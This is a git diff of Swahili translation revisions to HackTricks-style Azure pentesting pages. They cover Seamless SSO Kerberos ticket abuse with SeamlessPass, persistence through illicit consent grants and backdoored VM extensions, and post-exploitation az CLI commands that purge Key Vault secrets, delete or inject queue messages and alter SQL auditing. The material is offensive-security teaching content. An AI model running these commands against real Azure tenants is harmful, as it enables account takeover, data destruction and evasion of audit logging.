[ilivyoelezwa katika chapisho hili la blog](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). Kwa hiyo unahitaji tu moja ya yafuatayo: - **TGT ya mtumiaji aliyeathiriwa:** Hata kama huna moja lakini mtumiaji ameathiriwa, unaweza kupata moja kwa kutumia hila ya uwakilishi wa TGT bandia iliyotekelezwa katika zana nyingi kama [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) na [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). -- **Tiketi ya Dhahabu**: Ikiwa una ufunguo wa KRBTGT, unaweza kuunda TGT unayohitaji kwa mtumiaji aliyeathiriwa. +- **Golden Ticket**: Ikiwa una ufunguo wa KRBTGT, unaweza kuunda TGT unayohitaji kwa mtumiaji aliyeathiriwa. - **Hash ya NTLM ya mtumiaji aliyeathiriwa au ufunguo wa AES:** SeamlessPass itawasiliana na kidhibiti cha eneo na habari hii ili kuunda TGT. -- **Hash ya NTLM ya akaunti ya AZUREADSSOACC$ au ufunguo wa AES:** Kwa habari hii na Kitambulisho cha Usalama wa mtumiaji (SID) ili kushambulia inawezekana kuunda tiketi ya huduma na kuthibitisha na wingu (kama ilivyofanywa katika njia ya awali). +- **Hash ya NTLM ya akaunti ya AZUREADSSOACC$ au ufunguo wa AES:** Kwa habari hii na Kitambulisho cha Usalama (SID) cha mtumiaji anayeshambuliwa, inawezekana kuunda tiketi ya huduma na kuthibitisha na wingu (kama ilivyofanywa katika njia ya awali). Hatimaye, kwa TGT inawezekana kutumia zana [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) na: ``` seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt ``` -Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). +Taarifa zaidi za kuweka Firefox kufanya kazi na seamless SSO zinaweza [**kupatikana katika chapisho hili la blog**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). -#### ~~Creating Kerberos tickets for cloud-only users~~ +#### ~~Kuunda tiketi za Kerberos kwa watumiaji wa wingu pekee~~ -If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](). +Ikiwa wasimamizi wa Active Directory wana ufikiaji wa Azure AD Connect, wanaweza **kweka SID kwa mtumiaji yeyote wa wingu**. Kwa njia hii tiketi za Kerberos **zinaweza kuundwa pia kwa watumiaji wa wingu pekee**. Sharti pekee ni kwamba SID iwe [SID]() sahihi. > [!CAUTION] -> Changing SID of cloud-only admin users is now **blocked by Microsoft**.\ -> For info check [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) +> Kubadilisha SID ya watumiaji wa usimamizi wa wingu pekee sasa **imezuiwa na Microsoft**.\ +> Kwa maelezo zaidi angalia [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) -### On-prem -> Cloud via Resource Based Constrained Delegation +### On-prem -> Wingu kupitia Uwakilishi wa Rasilimali ulio na Mipaka -Anyone that can manage computer accounts (`AZUREADSSOACC$`) in the container or OU this account is in, it can **configure a resource based constrained delegation over the account and access it**. +Mtu yeyote anayeweza kusimamia akaunti za kompyuta (`AZUREADSSOACC$`) katika kontena au OU ambayo akaunti hii iko ndani yake, anaweza **kuweka uwakilishi wa rasilimali ulio na mipaka juu ya akaunti na kuufikia**. ```python python rbdel.py -u \\ -p azureadssosvc$ ``` -## References +## Marejeleo - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) - [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) - [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) -- [TR19: Niko kwenye wingu lako, nikiangalia barua pepe za kila mtu - kuharibu Azure AD kupitia Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) +- [TR19: Niko kwenye wingu lako, nikisoma barua pepe za kila mtu - kuingilia Azure AD kupitia Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-persistence/README.md b/src/pentesting-cloud/azure-security/az-persistence/README.md index 1e7144dd9..49999c911 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/README.md +++ b/src/pentesting-cloud/azure-security/az-persistence/README.md @@ -4,17 +4,17 @@ ### Illicit Consent Grant -Kwa default, mtumiaji yeyote anaweza kujiandikisha programu katika Azure AD. Hivyo unaweza kujiandikisha programu (tu kwa ajili ya mpangilio wa lengo) inayohitaji ruhusa zenye athari kubwa kwa idhini ya admin (na kuidhinisha ikiwa wewe ni admin) - kama kutuma barua pepe kwa niaba ya mtumiaji, usimamizi wa majukumu n.k. Hii itaturuhusu **kutekeleza mashambulizi ya phishing** ambayo yatakuwa na **faida** kubwa endapo yatakuwa na mafanikio. +Kwa default, mtumiaji yeyote anaweza kujiandikisha programu katika Azure AD. Hivyo unaweza kujiandikisha programu (tu kwa ajili ya mpangilio wa lengo) inayohitaji ruhusa zenye athari kubwa kwa idhini ya admin (na kuidhinisha ikiwa wewe ni admin) - kama kutuma barua kwa niaba ya mtumiaji, usimamizi wa majukumu n.k. Hii itaturuhusu **kutekeleza mashambulizi ya phishing** ambayo yatakuwa na **faida** kubwa endapo yatakuwa na mafanikio. Zaidi ya hayo, unaweza pia kukubali programu hiyo kwa mtumiaji wako kama njia ya kudumisha ufikiaji juu yake. ### Applications and Service Principals -Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akreditivu (siri au cheti) kwa programu iliyopo. +Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akidi (siri au cheti) kwa programu iliyopo. Inawezekana **kulenga programu yenye ruhusa kubwa** au **kuongeza programu mpya** yenye ruhusa kubwa. -Jukumu la kuvutia kuongeza kwenye programu ingekuwa **jukumu la msimamizi wa uthibitishaji mwenye ruhusa** kwani inaruhusu **kurekebisha nenosiri** la Wasimamizi wa Kimataifa. +Jukumu la kuvutia kuongeza kwenye programu litakuwa **jukumu la msimamizi wa uthibitishaji wenye ruhusa** kwani linaruhusu **kurekebisha nenosiri** la Wasimamizi wa Kimataifa. Teknolojia hii pia inaruhusu **kuzidi MFA**. ```powershell @@ -28,9 +28,9 @@ Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -## References +## Marejeleo - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md index df3e0cff8..2bd1d6175 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md @@ -4,7 +4,7 @@ ## Storage Privesc -Kwa maelezo zaidi kuhusu hifadhi angalia: +Kwa maelezo zaidi kuhusu uhifadhi angalia: {{#ref}} ../az-services/az-storage.md @@ -14,11 +14,11 @@ Kwa maelezo zaidi kuhusu hifadhi angalia: - Hifadhi funguo za ufikiaji - Tengeneza SAS -- Watumiaji waliotengwa ni siku 7 tu +- Mtumiaji aliyetengwa ni siku 7 tu ### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write -Ruhusa hizi zinamruhusu mtumiaji kubadilisha mali za huduma ya blob kwa kipengele cha uhifadhi wa kufutwa, ambacho kinawaruhusu au kuunda kipindi cha uhifadhi kwa kontena zilizofutwa. Ruhusa hizi zinaweza kutumika kudumisha uendelevu ili kutoa fursa kwa mshambuliaji kurejesha au kubadilisha kontena zilizofutwa ambazo zinapaswa kuwa zimeondolewa kabisa na kufikia taarifa nyeti. +Ruhusa hizi zinamruhusu mtumiaji kubadilisha mali za huduma ya blob kwa kipengele cha uhifadhi wa kufutwa, ambacho kinawaruhusu au kuunda kipindi cha uhifadhi kwa kontena zilizofutwa. Ruhusa hizi zinaweza kutumika kudumisha kudumu ili kutoa fursa kwa mshambuliaji kurejesha au kubadilisha kontena zilizofutwa ambazo zinapaswa kuwa zimeondolewa kabisa na kufikia taarifa nyeti. ```bash az storage account blob-service-properties update \ --account-name \ @@ -27,7 +27,7 @@ az storage account blob-service-properties update \ ``` ### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action -Hizi ruhusa zinaweza kumpelekea mshambuliaji kubadilisha sera za uhifadhi, kurejesha data iliyofutwa, na kupata taarifa nyeti. +Ruhusa hizi zinaweza kumpelekea mshambuliaji kubadilisha sera za uhifadhi, kurejesha data zilizofutwa, na kufikia taarifa nyeti. ```bash az storage blob service-properties delete-policy update \ --account-name \ diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md index 1b7794438..6a26b5d29 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu VMs angalia: ### Backdoor VM applications, VM Extensions & Images -Mshambuliaji anapotambua programu, nyongeza au picha zinazotumiwa mara kwa mara katika akaunti ya Azure, anaweza kuingiza msimbo wake katika programu za VM na nyongeza ili kila wakati zinapowekwa, backdoor inatekelezwa. +Mshambuliaji anapotambua programu, nyongeza au picha zinazotumiwa mara kwa mara katika akaunti ya Azure, anaweza kuingiza msimbo wake katika programu na nyongeza za VM ili kila wakati zinapowekwa, backdoor inatekelezwa. ### Backdoor Instances diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md index ba6f5b88d..a69310879 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu uhifadhi angalia: ### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read -Msingi mwenye ruhusa hii ataweza **orodhesha** blobs (faili) ndani ya kontena na **kupakua** faili ambazo zinaweza kuwa na **taarifa nyeti**. +Mtu mwenye ruhusa hii ataweza **orodhesha** blobs (faili) ndani ya kontena na **kupakua** faili ambazo zinaweza kuwa na **taarifa nyeti**. ```bash # e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read az storage blob list \ @@ -26,7 +26,7 @@ az storage blob download \ ``` ### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -Mtu mwenye ruhusa hii ataweza **kuandika na kufuta faili katika kontena** ambayo inaweza kumruhusu kuleta uharibifu au hata kuongeza mamlaka (kwa mfano, kufuta baadhi ya msimbo uliohifadhiwa katika blob): +Mtu mwenye ruhusa hii ataweza **kuandika na kufuta faili katika kontena** ambayo inaweza kumruhusu kufanya uharibifu au hata kupandisha mamlaka (kwa mfano, kufuta baadhi ya msimbo uliohifadhiwa katika blob): ```bash # e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write az storage blob upload \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md index b648ac402..b7b3aee9a 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu file shares angalia: ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read -Mtu mwenye ruhusa hii ataweza **orodhesha** faili ndani ya file share na **kupakua** faili ambazo zinaweza kuwa na **habari nyeti**. +Mtu mwenye ruhusa hii ataweza **orodhesha** faili ndani ya file share na **kupakua** faili ambazo zinaweza kuwa na **taarifa nyeti**. ```bash # List files inside an azure file share az storage file list \ @@ -30,7 +30,7 @@ az storage file download \ ``` ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action -Mtu mwenye ruhusa hii ataweza **kuandika na kufuta faili katika sehemu za faili** ambayo inaweza kumruhusu kufanya uharibifu au hata kupandisha mamlaka (kwa mfano, kufuta baadhi ya msimbo uliohifadhiwa katika sehemu ya faili): +Mtu mwenye ruhusa hii ataweza **kuandika na kufuta faili katika sehemu za faili** ambayo inaweza kumruhusu kuleta uharibifu au hata kuongeza mamlaka (kwa mfano, kufuta baadhi ya msimbo uliohifadhiwa katika sehemu ya faili): ```bash az storage blob upload \ --account-name \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md index 6e0fe66db..f780cf40b 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md @@ -10,7 +10,7 @@ Kwa maelezo zaidi kuhusu function apps angalia: ../az-services/az-function-apps.md {{#endref}} -> [!CAUTION] > **Hila za post exploitation za Function Apps zina uhusiano mkubwa na hila za kupandisha mamlaka** hivyo unaweza kuziona zote huko: +> [!CAUTION] > **Hila za post exploitation za Function Apps zinahusiana sana na hila za kupandisha hadhi** hivyo unaweza kuziona zote huko: {{#ref}} ../az-privilege-escalation/az-functions-app-privesc.md diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md index 234c53023..47930b85c 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md @@ -52,7 +52,7 @@ az keyvault key purge --vault-name --name ``` ### **Microsoft.KeyVault/vaults/secrets/purge/action** -Ruhusa hii inaruhusu mtu mwenye mamlaka kufuta siri kwa kudumu kutoka kwenye vault. +Ruhusa hii inaruhusu mhusika kufuta kwa kudumu siri kutoka kwenye vault. ```bash az keyvault secret purge --vault-name --name ``` @@ -76,13 +76,13 @@ az keyvault key delete --vault-name --name ``` ### **Microsoft.KeyVault/vaults/secrets/delete** -Ruhusa hii inaruhusu kiongozi kufuta siri kutoka kwenye vault. Siri inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa kabisa. +Ruhusa hii inaruhusu mhusika kufuta siri kutoka kwenye vault. Siri inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa. ```bash az keyvault secret delete --vault-name --name ``` ### Microsoft.KeyVault/vaults/secrets/restore/action -Ruhusa hii inaruhusu mhusika kurejesha siri kutoka kwenye nakala ya akiba. +Ruhusa hii inaruhusu mhusika kurejesha siri kutoka kwa nakala ya akiba. ```bash az keyvault secret restore --vault-name --file ``` diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md index 1f76867a4..cb7fd2f67 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia: ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` -Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa umeshughulikiwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi. +Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa yamechakatwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi. ```bash az storage message peek --queue-name --account-name ``` @@ -26,13 +26,13 @@ az storage message get --queue-name --account-name --content "Injected malicious message" --account-name ``` ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` -Ruhusa hii inamruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kuongoza vibaya programu au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni. +Ruhusa hii inamruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kuongoza programu vibaya au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name @@ -46,19 +46,19 @@ az storage message update --queue-name \ ``` ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete` -Ruhusa hii inamruhusu mshambuliaji kufuta foleni ndani ya akaunti ya hifadhi. Kwa kutumia uwezo huu, mshambuliaji anaweza kuondoa kwa kudumu foleni na ujumbe wao wote waliounganishwa, na kusababisha usumbufu mkubwa katika michakato na kusababisha kupoteza data muhimu kwa programu zinazotegemea foleni zilizoathiriwa. Kitendo hiki kinaweza pia kutumika kuharibu huduma kwa kuondoa vipengele muhimu vya mfumo. +Ruhusa hii inaruhusu mshambuliaji kufuta foleni ndani ya akaunti ya hifadhi. Kwa kutumia uwezo huu, mshambuliaji anaweza kuondoa kwa kudumu foleni na ujumbe wao wote waliounganishwa, na kusababisha usumbufu mkubwa katika michakato na kusababisha kupoteza kwa data muhimu kwa programu zinazotegemea foleni zilizoathiriwa. Kitendo hiki kinaweza pia kutumika kuharibu huduma kwa kuondoa vipengele muhimu vya mfumo. ```bash az storage queue delete --name --account-name ``` ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete` -Kwa ruhusa hii, mshambuliaji anaweza kufuta ujumbe wote kutoka kwa Azure Storage Queue. Kitendo hiki kinafuta ujumbe wote, kinaharibu mchakato wa kazi na kusababisha kupoteza data kwa mifumo inayotegemea foleni. +Kwa ruhusa hii, mshambuliaji anaweza kufuta ujumbe wote kutoka kwa Azure Storage Queue. Kitendo hiki kinafuta ujumbe wote, kinaharibu mchakato wa kazi na kusababisha kupoteza data kwa mifumo inayotegemea foleni hiyo. ```bash az storage message clear --queue-name --account-name ``` ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` -Ruhusa hii inamruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi. +Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu mchakato wa kazi, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi. ```bash az storage queue create --name --account-name @@ -66,7 +66,7 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -## References +## Marejeleo - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md index 3e1a44a27..04b9606af 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md @@ -18,7 +18,7 @@ az servicebus namespace delete --resource-group --name --namespace-name --name ``` @@ -36,41 +36,41 @@ az servicebus topic subscription delete --resource-group --n ``` ### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus namespaces anaweza kutumia hii kuharibu shughuli, kupeleka rasilimali zisizoidhinishwa, au kufichua data nyeti. Wanaweza kubadilisha mipangilio muhimu kama vile kuwezesha ufikiaji wa mtandao wa umma, kupunguza mipangilio ya usimbuaji, au kubadilisha SKUs ili kudhoofisha utendaji au kuongeza gharama. Zaidi ya hayo, wanaweza kuzima uthibitishaji wa ndani, kubadilisha maeneo ya nakala, au kurekebisha toleo la TLS ili kudhoofisha udhibiti wa usalama, na kufanya makosa ya usanidi wa namespace kuwa hatari kubwa baada ya kutekeleza. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus namespaces anaweza kutumia hii kuharibu shughuli, kupeleka rasilimali zisizoidhinishwa, au kufichua data nyeti. Wanaweza kubadilisha mipangilio muhimu kama vile kuwezesha ufikiaji wa mtandao wa umma, kupunguza mipangilio ya usimbuaji, au kubadilisha SKUs ili kupunguza utendaji au kuongeza gharama. Zaidi ya hayo, wanaweza kuzima uthibitishaji wa ndani, kubadilisha maeneo ya nakala, au kurekebisha toleo la TLS ili kupunguza udhibiti wa usalama, na kufanya makosa ya usanidi wa namespace kuwa hatari kubwa baada ya kutekeleza. ```bash az servicebus namespace create --resource-group --name --location az servicebus namespace update --resource-group --name --tags ``` ### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`) -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus queues (ili kubadilisha foleni unahitaji pia Action: `Microsoft.ServiceBus/namespaces/queues/read`) anaweza kutumia hii kukamata data, kuharibu mchakato wa kazi, au kuwezesha ufikiaji usioidhinishwa. Wanaweza kubadilisha mipangilio muhimu kama vile kupeleka ujumbe kwa maeneo mabaya, kurekebisha TTL ya ujumbe ili kuhifadhi au kufuta data vibaya, au kuwezesha dead-lettering kuingilia kati usimamizi wa makosa. Zaidi ya hayo, wanaweza kubadilisha saizi za foleni, muda wa kufunga, au hali ili kuharibu utendaji wa huduma au kuepuka kugundulika, na kufanya hii kuwa hatari kubwa baada ya unyakuzi. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha Azure Service Bus queues (ili kubadilisha foleni unahitaji pia Action:`Microsoft.ServiceBus/namespaces/queues/read`) anaweza kutumia hii kukamata data, kuharibu workflows, au kuwezesha ufikiaji usioidhinishwa. Wanaweza kubadilisha mipangilio muhimu kama vile kupeleka ujumbe kwa maeneo mabaya, kubadilisha TTL ya ujumbe ili kuhifadhi au kufuta data vibaya, au kuwezesha dead-lettering kuingilia kati usimamizi wa makosa. Zaidi ya hayo, wanaweza kubadilisha saizi za foleni, muda wa kufunga, au hali ili kuharibu utendaji wa huduma au kuepuka kugunduliwa, na kufanya hii kuwa hatari kubwa baada ya kutekeleza. ```bash az servicebus queue create --resource-group --namespace-name --name az servicebus queue update --resource-group --namespace-name --name ``` ### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha mada (ili kubadilisha mada unahitaji pia Action: `Microsoft.ServiceBus/namespaces/topics/read`) ndani ya eneo la Azure Service Bus anaweza kutumia hii kuharibu mchakato wa ujumbe, kufichua data nyeti, au kuwezesha vitendo visivyoidhinishwa. Kwa kutumia amri kama az servicebus topic update, wanaweza kubadilisha mipangilio kama vile kuwezesha ugawaji kwa matumizi mabaya ya upanuzi, kubadilisha mipangilio ya TTL ili kuhifadhi au kutupa ujumbe vibaya, au kuzima ugunduzi wa nakala ili kupita udhibiti. Zaidi ya hayo, wanaweza kurekebisha mipaka ya ukubwa wa mada, kubadilisha hali ili kuharibu upatikanaji, au kuunda mada za haraka kuhifadhi ujumbe waliokamatwa kwa muda, na kufanya usimamizi wa mada kuwa kipaumbele muhimu kwa kupunguza madhara baada ya kutekeleza. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha mada (ili kubadilisha mada unahitaji pia Action:`Microsoft.ServiceBus/namespaces/topics/read`) ndani ya jina la Azure Service Bus anaweza kutumia hii kuharibu mchakato wa ujumbe, kufichua data nyeti, au kuwezesha vitendo visivyoidhinishwa. Kwa kutumia amri kama az servicebus topic update, wanaweza kubadilisha mipangilio kama vile kuwezesha ugawaji kwa matumizi mabaya ya upanuzi, kubadilisha mipangilio ya TTL ili kuhifadhi au kutupa ujumbe vibaya, au kuzima ugunduzi wa nakala ili kupita udhibiti. Zaidi ya hayo, wanaweza kurekebisha mipaka ya ukubwa wa mada, kubadilisha hali ili kuharibu upatikanaji, au kuunda mada za haraka kuhifadhi ujumbe waliokamatwa kwa muda, na kufanya usimamizi wa mada kuwa kipaumbele muhimu kwa kupunguza madhara baada ya unyakuzi. ```bash az servicebus topic create --resource-group --namespace-name --name az servicebus topic update --resource-group --namespace-name --name ``` ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) -Mshambuliaji mwenye ruhusa za kuunda au kubadilisha usajili (ili kubadilisha usajili utahitaji pia Kitendo: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) ndani ya mada ya Azure Service Bus anaweza kutumia hii kukamata, kuelekeza upya, au kuharibu mchakato wa ujumbe. Kwa kutumia amri kama az servicebus topic subscription update, wanaweza kubadilisha mipangilio kama vile kuwezesha dead lettering ili kuelekeza ujumbe, kupeleka ujumbe kwa maeneo yasiyoidhinishwa, au kubadilisha TTL na muda wa kufunga ili kuhifadhi au kuingilia kati utoaji wa ujumbe. Zaidi ya hayo, wanaweza kubadilisha hali au mipangilio ya idadi ya juu ya utoaji ili kuharibu shughuli au kuepuka kugunduliwa, na kufanya udhibiti wa usajili kuwa kipengele muhimu katika hali za baada ya unyakuzi. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha usajili (ili kubadilisha usajili utahitaji pia Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) ndani ya mada ya Azure Service Bus anaweza kutumia hii kukamata, kuelekeza upya, au kuharibu mchakato wa ujumbe. Kwa kutumia amri kama az servicebus topic subscription update, wanaweza kubadilisha mipangilio kama vile kuwezesha dead lettering ili kuelekeza ujumbe, kupeleka ujumbe kwa maeneo yasiyoidhinishwa, au kubadilisha TTL na muda wa kufunga ili kuhifadhi au kuingilia kati utoaji wa ujumbe. Zaidi ya hayo, wanaweza kubadilisha hali au mipangilio ya idadi ya juu ya utoaji ili kuharibu shughuli au kuepuka kugunduliwa, na kufanya udhibiti wa usajili kuwa kipengele muhimu katika hali za baada ya unyakuzi. ```bash az servicebus topic subscription create --resource-group --namespace-name --topic-name --name az servicebus topic subscription update --resource-group --namespace-name --topic-name --name ``` -### Actions: `AuthorizationRules` Send & Recive Messages +### Vitendo: `AuthorizationRules` Tuma & Pokea Ujumbe -Tazama hapa: +Angalia hapa: {{#ref}} ../az-privilege-escalation/az-queue-privesc.md {{#endref}} -## References +## Marejeleo - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md index a0d1dce8d..bc2ea167c 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md @@ -42,7 +42,7 @@ az sql elastic-pool update \ ``` ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write" -Kwa ruhusa hii, unaweza kubadilisha au kuwezesha mipangilio ya ukaguzi kwenye Azure SQL Server. Hii inaweza kumruhusu mshambuliaji au mtumiaji aliyeidhinishwa kubadilisha usanidi wa ukaguzi, ambayo inaweza kuficha alama au kuelekeza kumbukumbu za ukaguzi kwenye eneo chini ya udhibiti wao. Hii inaweza kuzuia ufuatiliaji wa usalama au kuwezesha kuendelea kufuatilia vitendo. KUMBUKA: Ili kuwezesha ukaguzi kwa Azure SQL Server ukitumia Blob Storage, lazima uunganishe akaunti ya hifadhi ambapo 